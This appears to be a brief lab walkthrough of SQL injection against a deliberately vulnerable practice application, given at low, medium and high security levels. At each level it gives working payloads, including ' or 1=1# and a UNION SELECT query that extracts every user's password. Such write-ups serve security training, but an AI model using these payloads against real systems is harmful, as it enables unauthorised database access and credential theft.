Security level: low
We can detect SQL injection with ' on submiting this we get SQL error.
we can see all entries with ' or 1=1# :
We can extract all passwords with payload:
' UNION SELECT user, password FROM users#
Security level: medium
It’s using POST parameter and quotes are filtered, but ID value is directly added to the query so we dont even need quotes.
payload: 1 or 1=1 UNION SELECT user, password FROM users#
Security level: high
payload from low security also works here.
Payload: ' UNION SELECT user, password FROM users#
Happy Hacking